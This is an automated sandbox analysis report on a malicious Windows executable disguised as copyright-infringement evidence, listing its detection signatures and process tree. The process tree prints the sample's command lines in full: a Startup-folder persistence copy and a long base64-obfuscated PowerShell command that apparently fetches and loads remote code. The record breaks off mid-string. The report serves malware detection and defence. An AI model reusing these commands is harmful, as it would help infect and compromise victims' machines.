Windows Analysis Report
copyright_infringement_evidence_1.exe
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops script or batch files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- copyright_infringement_evidence_1.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\copyright_infringement_evidence_1.exe" MD5: 8C04E5D5ADAF15173FECD9384CEDA14D)
- cmd.exe (PID: 5036 cmdline: "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Acrobat.exe (PID: 2676 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
- AcroCEF.exe (PID: 6008 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- AcroCEF.exe (PID: 1716 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- wscript.exe (PID: 7404 cmdline: "wscript.exe" C:\Users\Public\Documents\2p_bee.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 7956 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 8024 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
- powershell.exe (PID: 6688 cmdline: powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 7320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwAr